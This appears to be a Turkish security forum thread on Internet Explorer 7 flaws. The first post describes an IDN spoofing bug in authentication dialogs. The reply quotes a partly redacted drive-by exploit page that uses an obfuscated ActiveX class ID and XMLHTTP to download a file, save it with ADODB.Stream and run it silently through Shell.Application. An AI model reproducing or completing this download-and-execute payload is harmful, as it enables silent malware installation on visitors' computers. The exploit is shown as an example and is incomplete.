Uydumarket Banner  

Gösterilen Mesajlar: 2 mesajdan 1 ile 2 arası

Konu: Internet Explorer 7 Spoof güvenlik açığı

  1. #1
    Banned Member
    Giriş Tarihi
    11-05-2008
    Mekan
    Türkiye Dışı / Other Country
    Mesajlar
    1,221
    Üye No
    432931

    New Icon6 Internet Explorer 7 Spoof güvenlik açığı



    Problem HTTP Basic Authentication diyalog kutularında IDN (uluslararası Alan Adı) implementasyonun beklenmedik davranış göstermesinden kaynaklanıyor. Bu açıktan alan adında uluslararası karakterler kullanarak sunucuyu spoof ederek yararlanmak mümkün oluyor.Açığın tüm güncellemeleri yapılmış Windows XP üzerinde çalışan IE7′yi etkilediği rapor edildi. Diğer sürümler de etkileniyor olabilir.

    Çözüm:
    Şüpheli kimlik doğrulama diyalog kutularına kullanıcı adı ve şifre yazmayın

  2. #2
    Advanced Member
    Giriş Tarihi
    02-12-2006
    Mekan
    34 İstanbul
    Mesajlar
    4,042
    Üye No
    292029

    Eski Güvenlik Açıklarını Foruma Taşıyorsunuz Gibime Geldi...
    O Açık Şubat Ayından Beri Vardı Ama Bilinmiyordu.

    Zaten Bilmek Önemli Değil, Kullanıcı Yama Yazamaz.Ya Onu O Şekilde Kullanırsınız, Yada Yazılımcının Yama Çıkarıp Güncellemesini Beklersiniz...

    ie7 nin Belirgin Büyük ve Ayırd Edilmiş Açıkları Şu An İçin Olmadığı Söylenebilinir
    Şu Hariç
    KULLANILMAMASI İÇİN BAZI KISIMLAR EDİT

    Kod:
      <html> 
    <head> 
    <title>h4ck-y0u.org</title> 
    </head> 
    <body> 
    KULLANILMAMASI İÇİN EDİT
    df.setAttribute "clas"&"sid", "clsid:BD96C"&"556-65A3-11D0-"&"983A-00C04F"&"C29E36" 
    str="Microsoft"&"."&"XMLHTTP" 
    KULLANILMAMASI İÇİN EDİT ----
    str5=str1 
    set S = df.createobject(str5,"") 
    for count = 0 to 4 
    S.type = 1 
    kullanılmaması için edit S.open 
    S.write x.responseBody 
    S.savetofile fname1,2 
    S.close 
    if err.number = 0 then 
    set Q = df.createobject("Shell.Application","") 
    Q.ShellExecute fname1,"INSTALL","","open",0 
    KULLANILMAMASI İÇİN EDİT
    


Gönderme Kuralları

  • Yeni konu açamazsınız
  • Konuda cevap yazamazsınız
  • Eklenti yapamazsınız
  • Mesajlarınızı düzenleyemezsiniz
  •  
  • BB Kodları Açık
  • Smiley'ler Açık
  • Resim Kodları Açık
  • Video Kodları Açık
  • HTML Kodları Kapalı